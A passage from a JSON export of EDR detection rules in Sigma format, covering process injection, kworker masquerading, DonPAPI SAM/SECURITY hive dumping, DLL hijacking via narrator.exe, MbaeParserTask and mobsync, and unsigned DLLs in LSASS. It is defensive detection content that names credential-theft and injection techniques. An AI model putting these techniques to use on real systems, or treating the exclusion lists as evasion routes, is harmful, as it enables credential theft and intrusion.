Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(00000000f???????)|'\n - '|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(000000007???????)|'\n - '|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(00000000f???????)|'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(000000007???????)|'\n\n exclusion_cursor:\n ProcessName: 'Cursor.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Todesktop Limited'\n - 'Anysphere, Inc.'\n\n exclusion_adinsight:\n ProcessDescription: 'Active directory LDAP monitor'\n ProcessInternalName: 'ADInsight'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_netwrix:\n ProcessImage: '?:\\Windows\\Netwrix Auditor\\Netwrix Auditor Mailbox Access Core Service\\NombaAgent64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Netwrix Corporation'\n\n exclusion_cygwin:\n ProcessImage|contains:\n - '\\cygwin64\\bin\\'\n - '\\cygwin\\bin\\'\n - '\\cygwin\\usr\\sbin\\'\n - '\\cygwin1\\root\\bin\\'\n TargetImage|contains:\n - '\\cygwin64\\bin\\'\n - '\\cygwin\\bin\\'\n - '\\cygwin\\usr\\sbin\\'\n - '\\cygwin1\\root\\bin\\'\n\n exclusion_px4:\n TargetImage: '?:\\PX4\\toolchain\\cygwin64\\bin\\bash.exe'\n ProcessImage: '?:\\PX4\\home\\Firmware\\build\\px4_sitl_default\\bin\\px4.exe'\n\n exclusion_msys2:\n CallTrace|contains: '\\usr\\bin\\msys-2.0.dll+'\n\n exclusion_mcafee:\n CallTrace|endswith:\n - '|?:\\Program Files\\McAfee\\DLP\\Agent\\fcacafa64.dll+???|UNKNOWN(????????????????)'\n - '|?:\\Program Files\\McAfee\\DLP\\Agent\\fcacafa64.dll+????|UNKNOWN(????????????????)'\n - '|?:\\Program Files\\McAfee\\DLP\\Agent\\fcacafa64.dll+?????|UNKNOWN(????????????????)'\n\n exclusion_mojo:\n TargetProcessCommandLine|contains|all:\n - '--service-worker-schemes=vscode-webview'\n - '--mojo-platform-channel-handle='\n - '/prefetch:'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ca8123d8-d3c1-440a-985e-ecc31c2b39b8",
"rule_name": "Possible Process Injection from Unknown Module Detected",
"rule_description": "Detects an attempt to open a process with specific permissions associated with code injection, from an unknown module.\nThese specific permissions allow an attacker to remotely write a shellcode and create a remote thread pointing to it.\nIt is recommended to investigate the source process for suspicious activities.\nIt is also recommended to check for injected threads in the target process.\n",
"rule_creation_date": "2021-06-11",
"rule_modified_date": "2025-04-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ca8c50c9-be31-44c0-a2ca-c493faf68069",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611942Z",
"creation_date": "2026-03-23T11:45:34.611946Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611953Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html",
"https://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_kworker_masquerading.yml",
"content": "title: Kworker Process Masqueraded\nid: ca8c50c9-be31-44c0-a2ca-c493faf68069\ndescription: |\n Detects processes that try to masquerade as the kworker system process.\n Kworker is a placeholder process for kernel worker threads which perform most of the actual processing for the Linux kernel.\n Adversaries may attempt to manipulate their process name to make it appear legitimate or benign to users.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html\n - https://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2023/09/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n - ProcessProcessName|startswith: 'kworker/'\n Image|contains: '/'\n - ProcessCommandLine|startswith: '[kworker/'\n\n filter_parent:\n ProcessParentProcessName: 'kthreadd'\n ProcessGrandparentProcessName: 'kthreadd'\n\n exclusion_amazonlinux:\n AgentDistroid: 'amzn'\n ProcessImage:\n - '/usr/bin/kmod'\n - '/usr/lib/systemd/systemd-cgroups-agent'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ca8c50c9-be31-44c0-a2ca-c493faf68069",
"rule_name": "Kworker Process Masqueraded",
"rule_description": "Detects processes that try to masquerade as the kworker system process.\nKworker is a placeholder process for kernel worker threads which perform most of the actual processing for the Linux kernel.\nAdversaries may attempt to manipulate their process name to make it appear legitimate or benign to users.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2023-09-22",
"rule_modified_date": "2025-07-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "caa50242-5304-4ee7-8016-d72b99d151af",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627994Z",
"creation_date": "2026-03-23T11:45:34.627996Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628000Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/login-securite/DonPAPI/blob/main/donpapi/lib/secretsdump.py#L780",
"https://www.synacktiv.com/en/publications/windows-secrets-extraction-a-summary",
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-hashes-from-sam-registry",
"https://attack.mitre.org/techniques/T1003"
],
"name": "t1003_002_donpapi_sam_reg_save.yml",
"content": "title: SAM or SECURITY Hives Dumped from Registry via DonPAPI\nid: caa50242-5304-4ee7-8016-d72b99d151af\ndescription: |\n Detects a registry save to file operation of the SAM or SECURITY registry data with a specific file path characteristic of DonPAPI's Secretsdump.py.\n The Security Account Manager (SAM) and SECURITY registry hives in Microsoft Windows store sensitive user authentication and security policy information.\n Tools like DonPAPI's secretsdump.py can export these hives to steal credentials or manipulate security settings.\n These operations are a common tactic used by attackers to extract sensitive information that can be used for lateral movement or to further attacks.\n It is recommended to verify the legitimacy of the export and check for unusual network connections and authentications to the target machine.\nreferences:\n - https://github.com/login-securite/DonPAPI/blob/main/donpapi/lib/secretsdump.py#L780\n - https://www.synacktiv.com/en/publications/windows-secrets-extraction-a-summary\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-hashes-from-sam-registry\n - https://attack.mitre.org/techniques/T1003\ndate: 2024/07/11\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - classification.Windows.Source.Registry\n - classification.Windows.HackTool.DonPAPI\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SaveKey'\n TargetObject:\n - 'HKLM\\SECURITY'\n - 'HKLM\\SAM'\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n HivePath:\n - '?:\\windows\\system32\\\\????????????.log'\n - '?:\\Windows\\Temp\\\\????????????.log'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "caa50242-5304-4ee7-8016-d72b99d151af",
"rule_name": "SAM or SECURITY Hives Dumped from Registry via DonPAPI",
"rule_description": "Detects a registry save to file operation of the SAM or SECURITY registry data with a specific file path characteristic of DonPAPI's Secretsdump.py.\nThe Security Account Manager (SAM) and SECURITY registry hives in Microsoft Windows store sensitive user authentication and security policy information.\nTools like DonPAPI's secretsdump.py can export these hives to steal credentials or manipulate security settings.\nThese operations are a common tactic used by attackers to extract sensitive information that can be used for lateral movement or to further attacks.\nIt is recommended to verify the legitimacy of the export and check for unusual network connections and authentications to the target machine.\n",
"rule_creation_date": "2024-07-11",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cac0bdbb-27f5-4b46-8959-cfb19da1e1b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096602Z",
"creation_date": "2026-03-23T11:45:34.096604Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096608Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_narrator.yml",
"content": "title: Phantom DLL Hijacking via narrator.exe\nid: cac0bdbb-27f5-4b46-8959-cfb19da1e1b3\ndescription: |\n Detects a potential Windows DLL search order hijacking via narrator.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n - https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/06\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Narrator.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded:\n - '?:\\Windows\\System32\\speech\\engines\\tts\\MSTTSLocEnUS.dll'\n - '?:\\windows\\system32\\speech_onecore\\engines\\tts\\msttsloc_onecoreenus.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cac0bdbb-27f5-4b46-8959-cfb19da1e1b3",
"rule_name": "Phantom DLL Hijacking via narrator.exe",
"rule_description": "Detects a potential Windows DLL search order hijacking via narrator.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-11-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cafbc4e6-a99d-4275-81ae-2359ded64f02",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077065Z",
"creation_date": "2026-03-23T11:45:34.077067Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077072Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mbaeparsertask.yml",
"content": "title: DLL Hijacking via MbaeParserTask.exe\nid: cafbc4e6-a99d-4275-81ae-2359ded64f02\ndescription: |\n Detects potential Windows DLL Hijacking via MbaeParserTask.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MbaeParserTask.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mbaexmlparser.dll'\n - '\\mobilenetworking.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cafbc4e6-a99d-4275-81ae-2359ded64f02",
"rule_name": "DLL Hijacking via MbaeParserTask.exe",
"rule_description": "Detects potential Windows DLL Hijacking via MbaeParserTask.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb0d8bac-26b6-47af-a786-f5b7f41feb1e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599777Z",
"creation_date": "2026-03-23T11:45:34.599780Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599788Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mobsync.yml",
"content": "title: DLL Hijacking via mobsync.exe\nid: cb0d8bac-26b6-47af-a786-f5b7f41feb1e\ndescription: |\n Detects potential Windows DLL Hijacking via mobsync.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mobsync.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\edputil.dll'\n - '\\PROPSYS.dll'\n - '\\shell32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb0d8bac-26b6-47af-a786-f5b7f41feb1e",
"rule_name": "DLL Hijacking via mobsync.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mobsync.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb289a71-4836-4f9d-b12c-c0582903d497",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612804Z",
"creation_date": "2026-03-23T11:45:34.612808Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612815Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_loads_unsigned_dll.yml",
"content": "title: Unsigned DLL Loaded by LSASS\nid: cb289a71-4836-4f9d-b12c-c0582903d497\ndescription: |\n Detects when an unsigned DLL or EXE is loaded by the LSASS process.\n Attackers may try to load DLLs in LSASS as an attempt to dump credentials off the memory.\n This could also be a legitimate third party DLL addin features to the machine authentication mechanism.\n It is recommended to identify the unsigned DLL to determine its maliciousness and document legitimate third party DLLs.\nreferences:\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2020/09/30\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\lsass.exe'\n ImageLoaded|startswith: '?:\\'\n Signed: 'false'\n\n exclusion_winsxs:\n ImageLoaded:\n - '?:\\windows\\winsxs\\\\*\\mfc*.dll'\n - '?:\\windows\\winsxs\\\\*\\msv*.dll'\n exclusion_assembly:\n ImageLoaded: '?:\\Windows\\assembly\\NativeImages_*\\mscorlib.ni.dll'\n exclusion_ibm:\n ImageLoaded: '?:\\program files (x86)\\IBM\\Client Access\\\\*'\n exclusion_known_fp:\n ImageLoaded:\n - '?:\\windows\\system32\\firewallapi.dll' # d280021e4b245853d5e1df290ee894e4d4c1b0b735b536cadda3c4cb65b811f8\n - '?:\\windows\\system32\\fwbase.dll' # 395f68bfa50c2c233db8a7ef2badd51298526899d2e0e5ea7fb2e5e8617ab9b6\n - '?:\\windows\\system32\\peerdist.dll' # e8e2eebe93bfd031de6c9b792a09e97b226cdb46d8c6cbbae25da8965f77ff67\n exclusion_mdmregistration:\n # C:\\Windows\\System32\\mdmregistration.dll / 888281f120b95799998fe3f6ed1b475500113de0d36f10508e378646db6c01d7\n ImageLoaded: '?:\\Windows\\System32\\mdmregistration.dll'\n Description|contains: 'MDM Registration DLL'\n exclusion_SecureTimeAggregator:\n # C:\\Windows\\System32\\SecureTimeAggregator.dll / e76a202df9d6d75994d9b4d1dd07b077b1e33641aedbb7a4538c7f4383b5e030\n ImageLoaded: '?:\\Windows\\System32\\SecureTimeAggregator.dll'\n Description|contains: 'Secure Time Aggregator'\n exclusion_dpapi:\n # C:\\Windows\\System32\\dpapi.dll / e7df5bdea51d8f294ce24edb8631fca4a6ab9ed0925115d827148417267e234d\n ImageLoaded: '?:\\Windows\\System32\\dpapi.dll'\n Description|contains: 'Data Protection API'\n exclusion_ntdsapi:\n # C:\\Windows\\System32\\ntdsapi.dll / 4226b241ad2512d5e9daa101cbc693ed31d363b9f18a0fd247413a3c9ee3a4ba\n ImageLoaded: '?:\\Windows\\System32\\ntdsapi.dll'\n Description|contains: 'Active Directory Domain Services API'\n exclusion_vaultsvc:\n # c:\\windows\\system32\\vaultsvc.dll / a5f150c3aa29b70afb2741650cf35427c6cffe856cf104448803c697bd2f4df7\n ImageLoaded: '?:\\windows\\system32\\vaultsvc.dll'\n Description|contains: 'Credential Manager Service'\n exclusion_certpoleng:\n # c:\\windows\\system32\\CertPolEng.dll / 86eaa0a8dd22062a05bf0e88ed5e0b4718eea43b6fbaae72cac376bd2606eed1\n ImageLoaded: '?:\\windows\\system32\\CertPolEng.dll'\n Description|contains: 'Certificate Policy Engine'\n exclusion_cryptnet:\n # c:\\windows\\system32\\cryptnet.dll / b0ea497da38622462e3ed3b5c341839febab38142d6b4055bd4b292194024b2b\n ImageLoaded: '?:\\windows\\system32\\cryptnet.dll'\n Description|contains: 'Crypto Network Related API'\n exclusion_dhcpcsvc6:\n ImageLoaded: '?:\\Windows\\System32\\dhcpcsvc6.dll'\n Description: 'DHCPv6 Client'\n exclusion_peerdist:\n ImageLoaded: '?:\\Windows\\System32\\PeerDist.dll'\n Description: 'BranchCache Client Library'\n exclusion_ondemandconn:\n ImageLoaded: '?:\\Windows\\System32\\OnDemandConnRouteHelper.dll'\n Description: 'On Demand Connctiond Route Helper'\n exclusion_onecorecommon:\n ImageLoaded: '?:\\Windows\\System32\\OneCoreCommonProxyStub.dll'\n Description: 'OneCore Common Proxy Stub'\n exclusion_ngcpopkeysrv:\n ImageLoaded: '?:\\Windows\\System32\\ngcpopkeysrv.dll'\n Description: 'Microsoft Passport Proof-of-possession Key Service'\n exclusion_ibm_1:\n # c:\\Windows\\System32\\cwbunpls.dll / bd44f06770eab6f5fe89c22d1726fa5c787ea21faa080102b3ae7185a4795093\n # C:\\Windows\\System32\\cwbcore.dll / 7d7855761a4850e16cd202ea2a0e8e9610fbd6bdc6a6e6ef8de880b9cbb346cc\n ImageLoaded:\n - '?:\\Windows\\System32\\cwbunpls.dll'\n - '?:\\Windows\\System32\\cwbcore.dll'\n Company: 'IBM Corporation'\n exclusion_webio:\n # C:\\Windows\\System32\\webio.dll / e2a18218d1a641914284f8fd96740a48cfc89e5d69516e827f173b8f12f29758\n ImageLoaded: '?:\\Windows\\System32\\webio.dll'\n Description: 'Web Transfer Protocols API'\n 